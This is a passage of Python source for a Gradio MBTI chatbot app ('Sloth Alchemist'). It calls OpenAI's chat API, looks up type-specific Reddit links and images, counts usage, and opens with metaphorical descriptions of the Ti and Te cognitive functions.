
- **Ti:** Ti can be likened to the process by which wood is made. Just as wood is formed from cellulose, hemicellulose, and lignin arranged in a specific order to create a complex lignocellulosic structure, Ti uses a logical and systematic process to take raw information and create a structured and coherent understanding. In this way, Ti is like the chemical reactions and molecular interactions that occur in the formation of wood, transforming disorderly elements into a structured and functional whole. The internal framework and structure of a tree, like Ti, determines the strength, flexibility, and ultimately the shape of the wood, shaping the outcome of the growth and development process.

- **Te:** Te can be compared to the tree's ability to shed old leaves and grow new ones, which enables it to adapt and change in response to its environment. Similarly, Te is the cognitive function that helps us adapt to the external world and make decisions based on objective facts and data, enabling us to grow and evolve as individuals. Just as a tree sheds its old leaves to conserve resources and grow new ones, Te helps us shed inefficient or outdated ways of thinking and adopt more effective strategies to achieve our goals.

"""

def get_link(mbti_type):
    # Look up the Reddit thread URL for the selected type, then download the
    # two companion images referenced by the image-URL dictionaries.
    link = f'{mbti_dict[mbti_type]}'
    response = requests.get(mbti_dict_2[mbti_type])
    img = Image.open(BytesIO(response.content))
    response2 = requests.get(mbti_dict_3[mbti_type])
    img2 = Image.open(BytesIO(response2.content))
    return link, img, img2

def get_link2(funct):
    # Look up the Reddit thread URL in funct_dict.
    link2 = f'{funct_dict[funct]}'
    return link2

def get_link3(arch):
    # Look up the Reddit thread URL in arch_dict.
    link3 = f'{arch_dict[arch]}'
    return link3

def get_link4(gen):
    # Look up the Reddit thread URL in gen_dict.
    link4 = f'{gen_dict[gen]}'
    return link4
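# Illustrative usage, not part of the original app; it assumes the mbti_dict,
# mbti_dict_2, and mbti_dict_3 dictionaries defined earlier in this file all
# contain an "INFJ" entry (the key shown here is only an example):
#
#   link, img, img2 = get_link("INFJ")            # Reddit URL plus two PIL.Image objects
#   topic_link = get_link4("Unity Code - Overview")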

# Metrics -------
# 15/03/2023 Starting count

today = datetime.today().strftime("%Y-%m-%d")

def chatbot_interaction():
    # Hit the countapi.xyz counters (one overall, one per day) and read the
    # "value" field of the JSON they return.
    url = "https://api.countapi.xyz/hit/slothgpt/chatbot_req"
    response = requests.get(url)
    count = response.json()["value"]

    url_today = f"https://api.countapi.xyz/hit/slothgpt/chatbot_req{today}"
    response_today = requests.get(url_today)
    count_today = response_today.json()["value"]

    return f"{count} total - {count_today} today"

# End Metrics -----

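# A more defensive variant (a minimal sketch, not part of the original app; the
# helper name and the fallback string are assumptions). countapi.xyz is a
# third-party service, so a timeout or network error inside chatbot_interaction()
# would otherwise bubble up to the caller.
def chatbot_interaction_safe():
    try:
        return chatbot_interaction()
    except Exception:
        return "metrics unavailable"
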
def update_question_textbox(title, mbti_type, output_question=""):
    return questions_dict.get(title, output_question).format(mbti_type)

def get_empty_state():
    return {"total_tokens": 0, "messages": []}

def update_prompt_temp():
    choices = list(prompt_templates.keys())
    choices = choices[:1] + sorted(choices[1:])
    return gr.update(value=choices[0], choices=choices)

def update_mbti_dict():
    choices = list(mbti_dict.keys())
    choices = choices[:1] + sorted(choices[1:])
    return gr.update(value=choices[2], choices=choices)

def on_token_change(user_token):
    openai.api_key = user_token

def on_prompt_template_change(prompt_template):
    if not isinstance(prompt_template, str): return
    return prompt_templates[prompt_template]

def on_check_q(output_question, checkbox_q, input_user):
    return output_question if checkbox_q else input_user

def submit_message(user_token, prompt, prompt_template, temperature, max_tokens, context_length, state):

    history = state['messages']

    if not prompt:
        return gr.update(value=''), [(history[i]['content'], history[i+1]['content']) for i in range(0, len(history)-1, 2)], f"{state['total_tokens']}", state

    prompt_template = prompt_templates[prompt_template]

    system_prompt = [{ "role": "system", "content": prompt_template }]

    prompt_msg = { "role": "user", "content": prompt }

    try:
        # Send the system prompt, the last `context_length` user/assistant
        # exchanges, and the new user message to the Chat Completions API.
        completion = openai.ChatCompletion.create(model="gpt-3.5-turbo", messages=system_prompt + history[-context_length*2:] + [prompt_msg], temperature=temperature, max_tokens=max_tokens)

        history.append(prompt_msg)
        history.append(completion.choices[0].message.to_dict())

        state['total_tokens'] += completion['usage']['total_tokens']

    except Exception as e:
        # Surface the error in the chat window instead of crashing the UI.
        history.append(prompt_msg)
        history.append({
            "role": "system",
            "content": f"Error: {e}"
        })

    total_tokens_used_msg = f"{state['total_tokens']}"
    # Pair up the history into (user, assistant) tuples for the Chatbot component.
    chat_messages = [(history[i]['content'], history[i+1]['content']) for i in range(0, len(history)-1, 2)]

    return '', chat_messages, total_tokens_used_msg, state

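# How the context window above behaves, with illustrative numbers: if
# context_length is 2 and history already holds 10 messages, then
# history[-context_length*2:] keeps only the last 4 messages (the last two
# user/assistant exchanges), so each request sends the system prompt, those
# four messages, and the new user prompt.
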
def clear_conversation():
    return gr.update(value=None, visible=True), None, "", get_empty_state()

-css = """
- .gradio-container {background-color: white}
- #col-container {max-width: 100%; margin-left: auto; margin-right: auto;}
- #chatbox {min-height: 400px;}
- #image {max-width: 80%; margin-left: auto; margin-right: auto;}
- #image2 {max-width: 20%; margin-left: auto; margin-right: auto;}
- #image3 {max-width: 70%; margin-left: auto; margin-right: auto; border-radius: 4px;}
- #header {text-align: center; font-size: 1em;}
- #prompt_template_preview {padding: 1em; border-width: 1px; border-style: solid; border-color: #e0e0e0; border-radius: 4px;}
- #question_preview {padding: 1em; border-width: 1px; border-style: solid; border-color: #e0e0e0; border-radius: 4px; user-select: text;}
- #input_preview {padding: 1em; border-width: 1px; border-style: solid; border-color: #e0e0e0; border-radius: 4px; user-select: text;}
- #total_tokens_str {text-align: left; font-size: 0.8em; color: #666;}
- #label {padding: 0.5em; margin: 0;}
- .message { font-size: 1.2em; }
- """
-
with gr.Blocks(css=css, theme=gr.themes.Monochrome(), title="SlothAi.xyz") as demo:

    state = gr.State(get_empty_state())


    with gr.Column(elem_id="col-container"):
        gr.HTML("""
""")

        with gr.Row():
            with gr.Column():
                with gr.Tab("Home"):
                    chatbot = gr.Chatbot(elem_id="chatbox", label="Sloth Alchemist")
                    input_message = gr.Markdown(elem_id="question_preview", visible=False)
                    input_user = gr.Textbox(show_label=False, placeholder="Enter text and press enter", visible=True).style(container=False)
                    btn_submit = gr.Button("Submit")
                    default_k = gr.Markdown(value="By default, you are using the limited OpenAI key provided by SlothAi.xyz. If the limit is reached, enter your own free key at the bottom of the page. You can also increase the Sloth's creativity by adjusting the parameters in Settings; by default, it is tuned for a fast response time.", elem_id="question_preview")
                    total_tokens_str = gr.Textbox(label="Total tokens used:", elem_id="total_tokens_str", interactive=False)
                    btn_clear_conversation = gr.Button("Start New Conversation")
                    btn_clear_conversation.click(clear_conversation, [], [input_message, chatbot, total_tokens_str, state])
                    checkbox_q = gr.Checkbox(label="1.- Check to enable, then select your type and a question and press -Submit-. The question will be sent to the Sloth automatically.")
                    mbti_type_input = gr.Dropdown(label="2.- Select your type:", choices=list(mbti_dict.keys()), value="INFJ")
                    title_dropdown = gr.Dropdown(label="3.- Select a question:", choices=list(questions_dict.keys()), value="Hero Test")
                    output_question = gr.Markdown(value="Can you help me to find my type with your Hero Test?", elem_id="question_preview")
                    title_dropdown.change(update_question_textbox, inputs=[title_dropdown, mbti_type_input], outputs=[output_question])
                    gr.Markdown("---")
                    gr.Markdown("Enter your own OpenAI API Key. You can get it for free [here](https://platform.openai.com/account/api-keys). To save your API key for future use, you can add it to your web browser's password manager.", elem_id="label")
                    user_token = gr.Textbox(placeholder="OpenAI API Key", type="password", show_label=False)
                    user_token.change(on_token_change, inputs=[user_token], outputs=[])
                    gr.Markdown("---")
                    gr.HTML("""
